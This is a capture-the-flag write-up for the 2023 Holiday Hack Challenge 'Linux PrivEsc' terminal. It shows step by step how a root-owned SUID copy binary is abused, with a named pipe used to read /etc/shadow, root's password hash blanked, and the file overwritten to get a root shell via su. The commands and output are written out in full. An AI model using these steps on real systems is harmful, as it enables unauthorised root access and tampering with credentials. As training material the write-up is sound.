Skip to content

Linux PrivEsc⚓︎

Difficulty:
Direct link: https://hhc23-wetty.holidayhackchallenge.com?&challenge=linuxpriv

Objective⚓︎

Request

Rosemold is in Ostrich Saloon on the Island of Misfit Toys. Give her a hand with escalation for a tip about hidden islands.

Rose Mold

What am I doing in this saloon? The better question is: what planet are you from?
Yes, I’m a troll from the Planet Frost. I decided to stay on Earth after Holiday Hack 2021 and live among the elves because I made such dear friends here.
Whatever. Do you know much about privilege escalation techniques on Linux?
You're asking why? How about I'll tell you why after you help me.
And you might have to use that big brain of yours to get creative, bub.

Hints⚓︎

Linux Command Injection

From: Rose Mold

Use the privileged binary to overwriting a file to escalate privileges could be a solution, but there's an easier method if you pass it a crafty argument.

Linux Privilege Escalation Techniques

From: Rose Mold

There's various ways to escalate privileges on a Linux system.

Solution⚓︎

A terminal window challenges us to

  • Find a method to escalate privileges inside this terminal and then run the binary in /root *

A classical way to increase privileges in UNIX is a executable binary with set SUID bit. Such a binary runs under the privileges (effective user id) of its owner.

We search for SUID binaries:

$ find . -perm /u+s
find: './var/cache/ldconfig': Permission denied
find: './var/cache/apt/archives/partial': Permission denied
find: './var/lib/apt/lists/partial': Permission denied
./usr/bin/chfn
./usr/bin/chsh
./usr/bin/mount
./usr/bin/newgrp
./usr/bin/su
./usr/bin/gpasswd
./usr/bin/umount
./usr/bin/passwd
./usr/bin/simplecopy

Most of these are to be expected on a Linux system, except the last one.

We check its permissions and owner: 

$ ls -l /bin/simplecopy 
-rwsr-xr-x 1 root root 16952 Dec  2 22:17 /bin/simplecopy
Perfect. Owned by root, executable for all users (which includes us), and the SUID bit is set.

If "simplecopy" does what its name implies, it should allow us to copy arbitrary files, including /etc/shadow, where user credentials are stored: 

$ simplecopy -h
Usage: simplecopy <source> <destination>

$ simplecopy /etc/shadow .
This did work. However we still cannot access the copy, as simplecopy also copied the permissions and owner. 

$ ls -l shadow 
-rw-r----- 1 root root 526 Dec 29 22:09 shadow
So, we will use a pipe to receive the copied file and write its contents into another file: 
$ mkfifo shadow
$ cat shadow > shadow2&
$ simplecopy /etc/shadow .
[1]+  Done                    cat shadow > shadow2
We create a named pipe called "shadow" and attach to it the "cat" command running in the background. When simplecopy writes to the pipe, "cat" copies the contents to "shadow2".

Now, we can access the content:

$ cat shadow2
root:*:19689:0:99999:7:::
daemon:*:19689:0:99999:7:::
bin:*:19689:0:99999:7:::
sys:*:19689:0:99999:7:::
sync:*:19689:0:99999:7:::
games:*:19689:0:99999:7:::
man:*:19689:0:99999:7:::
lp:*:19689:0:99999:7:::
mail:*:19689:0:99999:7:::
news:*:19689:0:99999:7:::
uucp:*:19689:0:99999:7:::
proxy:*:19689:0:99999:7:::
www-data:*:19689:0:99999:7:::
backup:*:19689:0:99999:7:::
list:*:19689:0:99999:7:::
irc:*:19689:0:99999:7:::
gnats:*:19689:0:99999:7:::
nobody:*:19689:0:99999:7:::
_apt:*:19689:0:99999:7:::
elf:!:19693:0:99999:7:::

We want to remove the asterisk in the first line, declaring that "root" has no password. This container seems to lack an editor, but we simply copy & paste into another file.

cat > shadow3
cat shadow3
root::19689:0:99999:7:::
daemon:*:19689:0:99999:7:::
bin:*:19689:0:99999:7:::
...

Now, we overwrite the original "/etc/shadow" with our version: 

$ simplecopy shadow3 /etc/shadow
And root we become: 
$ su
root@ffa9a0281a33:/home/elf# id
uid=0(root) gid=0(root) groups=0(root)

Time to complete the challenge:

root@ffa9a0281a33:/home/elf# cd /root
root@ffa9a0281a33:~# ls
runmetoanswer
root@ffa9a0281a33:~# ./runmetoanswer 
Who delivers Christmas presents?

> Santa
Your answer: Santa

Checking....
Sorry, that answer is incorrect. Please try again!


root@ffa9a0281a33:~# ./runmetoanswer 
Who delivers Christmas presents?

> santa
Your answer: santa

Checking....
Your answer is correct!

Well, at least on the second attempt. Capitalization seems important!

Quicker? Yes, but....

Creafting a one-line shadow file with just a password-less root user and overwriting /etc/shadow would have been much quicker. But this would possibly have wrecked havoc on the other user accounts.

Images⚓︎

screenshot

Answer

After solving the challenge, the fact will be listed as an "Achievements" in the player's badge.

Response⚓︎

Rose Mold

Yup, I knew you knew. You just have that vibe.
To answer your question of why from earlier... Nunya!
But, I will tell you something better, about some information I... found.
There's a hidden, uncharted area somewhere along the coast of this island, and there may be more around the other islands.
The area is supposed to have something on it that's totes worth, but I hear all the bad vibe toys chill there.
That's all I got. K byyeeeee.
Ugh... n00bs...